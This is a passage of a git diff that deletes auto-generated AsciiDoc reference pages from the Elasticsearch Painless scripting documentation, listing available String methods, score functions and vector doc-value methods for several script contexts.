boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-processor-conditional/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-processor-conditional/index.asciidoc deleted file mode 100644 index 1d2096b0f59..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-processor-conditional/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-processor-conditional]] -=== Processor Conditional API - -The following specialized API is available in the Processor Conditional context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-processor-conditional/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-processor-conditional/packages.asciidoc deleted file mode 100644 index 66b5d475b75..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-processor-conditional/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-processor-conditional-java-lang"] -=== Processor Conditional API for package java.lang -See the <> for a high-level overview of all packages and classes. 
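The per-context `String` listings above and below include several Painless-only helpers on top of the regular `java.lang.String` API: `splitOnToken`, `encodeBase64`/`decodeBase64`, and the `replaceAll`/`replaceFirst` variants that take a regex literal (a `Pattern`) plus a `Function` over each match. A minimal sketch of how they might be used; the input values are assumptions and are not taken from these files:

[source,painless]
----
// A minimal sketch of the Painless-only String helpers (input values are assumptions).
String csv = "red,green,blue";
String[] parts = csv.splitOnToken(",");      // literal token split, no regex: [red, green, blue]

String encoded = "hello".encodeBase64();     // "aGVsbG8="
String decoded = encoded.decodeBase64();     // "hello"

// replaceAll/replaceFirst accept a regex literal (a Pattern) and a Function over each match;
// regex literals may need to be enabled via the script.painless.regex.enabled setting.
String masked = csv.replaceAll(/[aeiou]/, m -> "*");   // "r*d,gr**n,bl**"

return parts.length == 3 && decoded == "hello";
----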
- -[[painless-api-reference-processor-conditional-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-score/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-score/index.asciidoc deleted file mode 100644 index 7a6bad51e11..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-score/index.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-score]] -=== Score API - -The following specialized API is available in the Score context. - -* See the <> for further API available in all contexts. - -==== Static Methods -The following methods are directly callable without a class/instance qualifier. Note parameters denoted by a (*) are treated as read-only values. 
- -* double cosineSimilarity(List *, Object *) -* double cosineSimilaritySparse(Map *, Object *) -* double decayDateExp(String *, String *, String *, double *, JodaCompatibleZonedDateTime) -* double decayDateGauss(String *, String *, String *, double *, JodaCompatibleZonedDateTime) -* double decayDateLinear(String *, String *, String *, double *, JodaCompatibleZonedDateTime) -* double decayGeoExp(String *, String *, String *, double *, GeoPoint) -* double decayGeoGauss(String *, String *, String *, double *, GeoPoint) -* double decayGeoLinear(String *, String *, String *, double *, GeoPoint) -* double decayNumericExp(double *, double *, double *, double *, double) -* double decayNumericGauss(double *, double *, double *, double *, double) -* double decayNumericLinear(double *, double *, double *, double *, double) -* double dotProduct(List *, Object *) -* double dotProductSparse(Map *, Object *) -* double l1norm(List *, Object *) -* double l1normSparse(Map *, Object *) -* double l2norm(List *, Object *) -* double l2normSparse(Map *, Object *) -* double randomScore(int *) -* double randomScore(int *, String *) -* double saturation(double, double) -* double sigmoid(double, double, double) - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.xpack.vectors.query -<> - -* <> -* <> -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-score/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-score/packages.asciidoc deleted file mode 100644 index 5be078469d6..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-score/packages.asciidoc +++ /dev/null @@ -1,234 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-score-java-lang"] -=== Score API for package java.lang -See the <> for a high-level overview of all packages and classes. 
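As an aside to the Score API listing above, a minimal sketch of a `script_score` script body that combines a few of the static score functions; the field names, `params` entries, and weights are assumptions for illustration only:

[source,painless]
----
// A minimal sketch of a script_score body (field names and params are assumptions).
double pop   = saturation(doc['likes'].value, 10);         // diminishing returns on a count field
double fresh = decayDateGauss(params.origin, params.scale,
                              params.offset, params.decay,
                              doc['publish_date'].value);  // gaussian decay on a date field
return pop + fresh + 0.01 * randomScore(params.seed);      // small, stable tie-breaker
----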
- -[[painless-api-reference-score-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-score-org-elasticsearch-xpack-vectors-query"] -=== Score API for package org.elasticsearch.xpack.vectors.query -See the <> for a high-level overview of all packages and classes. 
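The `org.elasticsearch.xpack.vectors.query` classes listed below are mostly used as opaque handles: a script reads `doc['field']` and passes the resulting doc values to the static vector functions from the index above. A minimal sketch, assuming a `dense_vector` field `my_dense_vector`, a `sparse_vector` field `my_sparse_vector`, and query vectors supplied through `params`:

[source,painless]
----
// Dense vectors: params.query_vector is assumed to be a List of numbers.
double dense = dotProduct(params.query_vector, doc['my_dense_vector']);

// Sparse vectors: params.sparse_query is assumed to be a Map of dimension -> weight.
double sparse = dotProductSparse(params.sparse_query, doc['my_sparse_vector']);

// l2norm is the L2 distance between the query vector and the stored vector;
// a smaller distance should contribute a larger score.
double dist = l2norm(params.query_vector, doc['my_dense_vector']);

return dense + sparse + 1.0 / (1.0 + dist);
----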
- -[[painless-api-reference-score-VectorScriptDocValues]] -==== VectorScriptDocValues -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(String) -* Object getByPath(String, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* String join(String) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] 
{java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-score-VectorScriptDocValues-DenseVectorScriptDocValues]] -==== VectorScriptDocValues.DenseVectorScriptDocValues -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(String) -* Object getByPath(String, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* String join(String) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List 
{java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-score-VectorScriptDocValues-SparseVectorScriptDocValues]] -==== VectorScriptDocValues.SparseVectorScriptDocValues -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(String) -* Object getByPath(String, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* String join(String) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List 
split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-script-heuristic/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-script-heuristic/index.asciidoc deleted file mode 100644 index 8b32ad624a3..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-script-heuristic/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-script-heuristic]] -=== Script Heuristic API - -The following specialized API is available in the Script Heuristic context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-script-heuristic/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-script-heuristic/packages.asciidoc deleted file mode 100644 index e5799e8fdd4..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-script-heuristic/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-script-heuristic-java-lang"] -=== Script Heuristic API for package java.lang -See the <> for a high-level overview of all packages and classes. 
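For orientation, the Script Heuristic context backs the `scripted_heuristic` option of the `significant_terms` aggregation: the script computes a significance score from bucket statistics passed in through `params`. A minimal sketch; the `params._subset_*`/`params._superset_*` names follow the scripted-heuristic convention and are assumptions, not part of the listings in this file:

[source,painless]
----
// A minimal sketch of a scripted significance heuristic body.
// The _subset/_superset statistics are supplied by the aggregation (assumption).
double subsetFreq   = (double) params._subset_freq;
double supersetFreq = (double) params._superset_freq + 1;   // +1 avoids division by zero
return subsetFreq / supersetFreq;
----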
- -[[painless-api-reference-script-heuristic-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String 